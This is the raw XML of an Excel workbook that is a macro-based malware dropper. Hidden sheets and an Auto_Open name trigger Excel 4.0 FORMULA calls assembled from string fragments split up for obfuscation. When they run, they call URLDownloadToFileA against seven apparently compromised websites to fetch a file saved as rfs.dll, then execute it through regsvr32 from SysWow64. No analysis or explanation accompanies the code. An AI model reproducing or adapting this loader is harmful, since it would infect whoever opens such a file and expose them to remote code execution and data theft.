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osik\Desktop\File3\16m\CIR-ZV\ZV\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{4080AF39-A2B5-45BD-A50F-3C96E28CF62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Cdfea" sheetId="2" state="hidden" r:id="rId2"/>
    <sheet name="Tgbs" sheetId="3" state="hidden" r:id="rId3"/>
    <sheet name="Tgbfgs" sheetId="4" state="hidden" r:id="rId4"/>
    <sheet name="PCWV" sheetId="5" state="hidden" r:id="rId5"/>
  </sheets>
  <definedNames>
    <definedName name="NEVR1">PCWV!$G$13</definedName>
    <definedName name="NEVR2">PCWV!$G$15</definedName>
    <definedName name="NEVR3">PCWV!$G$17</definedName>
    <definedName name="NEVR4">PCWV!$G$19</definedName>
    <definedName name="NEVR5">PCWV!$G$21</definedName>
    <definedName name="NEVR6">PCWV!$G$23</definedName>
    <definedName name="NEVR7">PCWV!$G$25</definedName>
    <definedName name="_xlnm.Auto_Open">PCWV!$G$1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1" i="3" l="1"/>
  <c r="I10" i="3"/>
  <c r="Q9" i="3"/>
  <c r="D7" i="3"/>
  <c r="F3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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="19" uniqueCount="19">
  <si>
    <t>-</t>
  </si>
  <si>
    <t>G</t>
  </si>
  <si>
    <t>!</t>
  </si>
  <si>
    <t>/</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;0, </t>
  </si>
  <si>
    <t xml:space="preserve"> ..\rfs.dll</t>
  </si>
  <si>
    <t>"..\rfs.dll</t>
  </si>
  <si>
    <t>",0,0)</t>
  </si>
  <si>
    <t>,0,</t>
  </si>
  <si>
    <t>r"&amp;"eg"&amp;"s"&amp;"vr3"&amp;"2.e"&amp;"x"&amp;"e</t>
  </si>
  <si>
    <t>\W"&amp;"ind"&amp;"o"&amp;"w"&amp;"s\</t>
  </si>
  <si>
    <t>S"&amp;"ysW"&amp;"ow"&amp;"64\</t>
  </si>
  <si>
    <t>"h"&amp;"ttp"&amp;"s://bv"&amp;"irt"&amp;"ual.c"&amp;"om/aff"&amp;"in"&amp;"ita/4j"&amp;"i"&amp;"y6L/",</t>
  </si>
  <si>
    <t>"h"&amp;"ttp"&amp;"s://b"&amp;"os"&amp;"ny.c"&amp;"o"&amp;"m/as"&amp;"p"&amp;"net_cli"&amp;"en"&amp;"t/txzR"&amp;"H8yy"&amp;"BfH"&amp;"35i/",</t>
  </si>
  <si>
    <t>"h"&amp;"tt"&amp;"p://br"&amp;"ian"&amp;"k"&amp;"ish.c"&amp;"o"&amp;"m/w"&amp;"p-in"&amp;"cl"&amp;"ud"&amp;"es/rU8"&amp;"R"&amp;"Ghppt"&amp;"Ole"&amp;"Z60"&amp;"70J8/",</t>
  </si>
  <si>
    <t>"h"&amp;"tt"&amp;"p://b"&amp;"ridge"&amp;"to"&amp;"bala"&amp;"nc"&amp;"e.c"&amp;"om/w"&amp;"p-co"&amp;"nt"&amp;"en"&amp;"t/up"&amp;"lo"&amp;"ad"&amp;"s/Oa"&amp;"nM"&amp;"dqd"&amp;"zM"&amp;"jmm"&amp;"c2"&amp;"FY/",</t>
  </si>
  <si>
    <t>"h"&amp;"tt"&amp;"p://b"&amp;"uk"&amp;"etk"&amp;"ucu"&amp;"kb"&amp;"ey.c"&amp;"o"&amp;"m/w"&amp;"p-a"&amp;"d"&amp;"mi"&amp;"n/is"&amp;"UHef"&amp;"bl/",</t>
  </si>
  <si>
    <t>"h"&amp;"tt"&amp;"p://b"&amp;"sg"&amp;"llc.t"&amp;"v/cl"&amp;"ou"&amp;"d/d"&amp;"AS"&amp;"rd"&amp;"9jE/",</t>
  </si>
  <si>
    <t>"h"&amp;"t"&amp;"tp://c"&amp;"aba"&amp;"ns.c"&amp;"om/la"&amp;"b"&amp;"s/at"&amp;"B4n"&amp;"hC3"&amp;"Pxho"&amp;"TrB"&amp;"e7/",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</si>
</sst>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0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6/relationships/xlIntlMacrosheet" Target="macrosheets/intlsheet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600075</xdr:colOff>
      <xdr:row>1</xdr:row>
      <xdr:rowOff>7336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C13C476-4CC6-4F3C-80B0-CC112DECA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24875" cy="283561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A0124FFD-D8B1-4C57-9FC3-DE9478087DFA}">
  <dimension ref="G8"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0">
      <selection activeCell="B4" sqref="B4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="7" max="7" width="255.7109375" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="8" spans="7:7" x14ac:dyDescent="0.25">
      <c r="G8" t="b">
        <f>FORMULA(Cdfea!P22&amp;Cdfea!H9&amp;Cdfea!L2&amp;Cdfea!B15&amp;Cdfea!B15&amp;Tgbs!D7&amp;Tgbs!F3&amp;Cdfea!F10&amp;Tgbs!I10&amp;Cdfea!H4&amp;Cdfea!L2&amp;Tgbs!Q9&amp;Tgbfgs!J17&amp;Tgbs!F14&amp;Tgbfgs!S15&amp;Tgbfgs!F16,G13)=FORMULA(Cdfea!P22&amp;Cdfea!J11&amp;Cdfea!B18&amp;Cdfea!P11&amp;"NEVR1"&amp;Tgbfgs!Q5&amp;Cdfea!H9&amp;Cdfea!L2&amp;Cdfea!B15&amp;Cdfea!B15&amp;Tgbs!D7&amp;Tgbs!F3&amp;Cdfea!F10&amp;Tgbs!I10&amp;Cdfea!H4&amp;Cdfea!L2&amp;Tgbs!Q9&amp;Tgbfgs!J17&amp;Tgbs!G16&amp;Tgbfgs!S15&amp;Tgbfgs!F16&amp;Cdfea!P13,G15)=FORMULA(Cdfea!P22&amp;Cdfea!J11&amp;Cdfea!B18&amp;Cdfea!P11&amp;"NEVR2"&amp;Tgbfgs!Q5&amp;Cdfea!H9&amp;Cdfea!L2&amp;Cdfea!B15&amp;Cdfea!B15&amp;Tgbs!D7&amp;Tgbs!F3&amp;Cdfea!F10&amp;Tgbs!I10&amp;Cdfea!H4&amp;Cdfea!L2&amp;Tgbs!Q9&amp;Tgbfgs!J17&amp;Tgbs!H14&amp;Tgbfgs!S15&amp;Tgbfgs!F16&amp;Cdfea!P13,G17)=FORMULA(Cdfea!P22&amp;Cdfea!J11&amp;Cdfea!B18&amp;Cdfea!P11&amp;"NEVR3"&amp;Tgbfgs!Q5&amp;Cdfea!H9&amp;Cdfea!L2&amp;Cdfea!B15&amp;Cdfea!B15&amp;Tgbs!D7&amp;Tgbs!F3&amp;Cdfea!F10&amp;Tgbs!I10&amp;Cdfea!H4&amp;Cdfea!L2&amp;Tgbs!Q9&amp;Tgbfgs!J17&amp;Tgbs!I16&amp;Tgbfgs!S15&amp;Tgbfgs!F16&amp;Cdfea!P13,G19)=FORMULA(Cdfea!P22&amp;Cdfea!J11&amp;Cdfea!B18&amp;Cdfea!P11&amp;"NEVR4"&amp;Tgbfgs!Q5&amp;Cdfea!H9&amp;Cdfea!L2&amp;Cdfea!B15&amp;Cdfea!B15&amp;Tgbs!D7&amp;Tgbs!F3&amp;Cdfea!F10&amp;Tgbs!I10&amp;Cdfea!H4&amp;Cdfea!L2&amp;Tgbs!Q9&amp;Tgbfgs!J17&amp;Tgbs!J14&amp;Tgbfgs!S15&amp;Tgbfgs!F16&amp;Cdfea!P13,G21)=FORMULA(Cdfea!P22&amp;Cdfea!J11&amp;Cdfea!B18&amp;Cdfea!P11&amp;"NEVR5"&amp;Tgbfgs!Q5&amp;Cdfea!H9&amp;Cdfea!L2&amp;Cdfea!B15&amp;Cdfea!B15&amp;Tgbs!D7&amp;Tgbs!F3&amp;Cdfea!F10&amp;Tgbs!I10&amp;Cdfea!H4&amp;Cdfea!L2&amp;Tgbs!Q9&amp;Tgbfgs!J17&amp;Tgbs!K16&amp;Tgbfgs!S15&amp;Tgbfgs!F16&amp;Cdfea!P13,G23)=FORMULA(Cdfea!P22&amp;Cdfea!J11&amp;Cdfea!B18&amp;Cdfea!P11&amp;"NEVR6"&amp;Tgbfgs!Q5&amp;Cdfea!H9&amp;Cdfea!L2&amp;Cdfea!B15&amp;Cdfea!B15&amp;Tgbs!D7&amp;Tgbs!F3&amp;Cdfea!F10&amp;Tgbs!I10&amp;Cdfea!H4&amp;Cdfea!L2&amp;Tgbs!Q9&amp;Tgbfgs!J17&amp;Tgbs!L14&amp;Tgbfgs!S15&amp;Tgbfgs!F16&amp;Cdfea!P13,G25)=FORMULA(Cdfea!P22&amp;Cdfea!J11&amp;Cdfea!B18&amp;Cdfea!P11&amp;"NEVR7"&amp;Tgbfgs!Q5&amp;Cdfea!H9&amp;Cdfea!B15&amp;Cdfea!I17&amp;Cdfea!I3&amp;Cdfea!H13&amp;Cdfea!P11&amp;Cdfea!K9&amp;Cdfea!P13&amp;Cdfea!P7&amp;Cdfea!P13,G27)=FORMULA(Cdfea!P22&amp;Cdfea!H13&amp;Cdfea!N4&amp;Cdfea!H13&amp;Cdfea!H9&amp;Cdfea!P11&amp;Cdfea!P15&amp;Cdfea!H9&amp;Cdfea!P20&amp;Tgbfgs!M12&amp;Tgbfgs!N8&amp;Tgbfgs!I4&amp;Tgbs!R21&amp;Tgbfgs!G10&amp;Cdfea!P15&amp;Cdfea!P13,G29)=FORMULA(Cdfea!P22&amp;Cdfea!G24&amp;Cdfea!H13&amp;Cdfea!E6&amp;Cdfea!E11&amp;Cdfea!G24&amp;Cdfea!K23&amp;Cdfea!P11&amp;Cdfea!P13,G34)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34" sqref="AM34"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="1" s="1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4DC43-2A26-40AB-9832-2194C1732D78}">
  <dimension ref="A2:Q37"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="F6" sqref="F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2</v>
      </c>
    </row>
    <row r="26" spans="2:16" x14ac:dyDescent="0.25">
      <c r="I26" t="str">
        <f>CHAR(84)</f>
        <v>T</v>
      </c>
    </row>
    <row r="27" spans="2:16" x14ac:dyDescent="0.25">
      <c r="P27" t="s">
        <v>3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11B45-B805-4F38-B230-891F0A33704C}">
  <dimension ref="D3:R21"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="C6" sqref="C6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="16384" width="9.140625" style="2"/>
  </cols>
  <sheetData>
    <row r="3" spans="4:17" x14ac:dyDescent="0.25">
      <c r="F3" s="2" t="str">
        <f>T(Cdfea!E2&amp;Cdfea!D7&amp;Cdfea!P15&amp;Cdfea!P7&amp;Cdfea!P15&amp;Cdfea!E11&amp;Cdfea!F4&amp;Cdfea!B15&amp;Cdfea!D13&amp;Cdfea!E2)</f>
        <v>on","URLDo</v>
      </c>
    </row>
    <row r="7" spans="4:17" x14ac:dyDescent="0.25">
      <c r="D7" s="2" t="str">
        <f>T(Cdfea!P11&amp;Cdfea!P15&amp;Cdfea!B5&amp;Cdfea!C3&amp;Cdfea!C9&amp;Cdfea!A12)</f>
        <v>("urlm</v>
      </c>
    </row>
    <row r="9" spans="4:17" x14ac:dyDescent="0.25">
      <c r="Q9" s="2" t="str">
        <f>T(Cdfea!P15&amp;Cdfea!P7&amp;Cdfea!P15&amp;Cdfea!J6&amp;Cdfea!J6&amp;Cdfea!H9&amp;Cdfea!H9&amp;Cdfea!K14&amp;Cdfea!K14&amp;Cdfea!P15)</f>
        <v>","JJCCBB"</v>
      </c>
    </row>
    <row r="10" spans="4:17" x14ac:dyDescent="0.25">
      <c r="I10" s="2" t="str">
        <f>T(Cdfea!D7&amp;Cdfea!C9&amp;Cdfea!E2&amp;Cdfea!D17&amp;Cdfea!F15&amp;Cdfea!E6&amp;Cdfea!E2&amp;Cdfea!B18&amp;Cdfea!G2&amp;Cdfea!C9)</f>
        <v>nloadToFil</v>
      </c>
    </row>
    <row r="14" spans="4:17" x14ac:dyDescent="0.25">
      <c r="F14" s="2" t="s">
        <v>12</v>
      </c>
      <c r="H14" s="2" t="s">
        <v>14</v>
      </c>
      <c r="J14" s="2" t="s">
        <v>16</v>
      </c>
      <c r="L14" s="2" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="16" spans="4:17" x14ac:dyDescent="0.25">
      <c r="G16" s="2" t="s">
        <v>13</v>
      </c>
      <c r="I16" s="2" t="s">
        <v>15</v>
      </c>
      <c r="K16" s="2" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="21" spans="18:18" x14ac:dyDescent="0.25">
      <c r="R21" s="2" t="str">
        <f>T(Cdfea!P19&amp;Cdfea!P2&amp;Cdfea!M7)</f>
        <v xml:space="preserve"> -s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98958-9042-4603-92C7-5EE1B68922FF}">
  <dimension ref="F4:S17"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B3" sqref="B3"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="4" spans="6:19" x14ac:dyDescent="0.25">
      <c r="I4" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="5" spans="6:19" x14ac:dyDescent="0.25">
      <c r="Q5" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="8" spans="6:19" x14ac:dyDescent="0.25">
      <c r="N8" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="10" spans="6:19" x14ac:dyDescent="0.25">
      <c r="G10" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="12" spans="6:19" x14ac:dyDescent="0.25">
      <c r="M12" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="15" spans="6:19" x14ac:dyDescent="0.25">
      <c r="S15" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="16" spans="6:19" x14ac:dyDescent="0.25">
      <c r="F16" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="17" spans="10:10" x14ac:dyDescent="0.25">
      <c r="J17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1</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="5" baseType="lpstr">
      <vt:lpstr>Sheet</vt:lpstr>
      <vt:lpstr>Cdfea</vt:lpstr>
      <vt:lpstr>Tgbs</vt:lpstr>
      <vt:lpstr>Tgbfgs</vt:lpstr>
      <vt:lpstr>PCWV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2022-03-16T14:36:43Z</dcterms:modified>
</cp:coreProperties>
</file>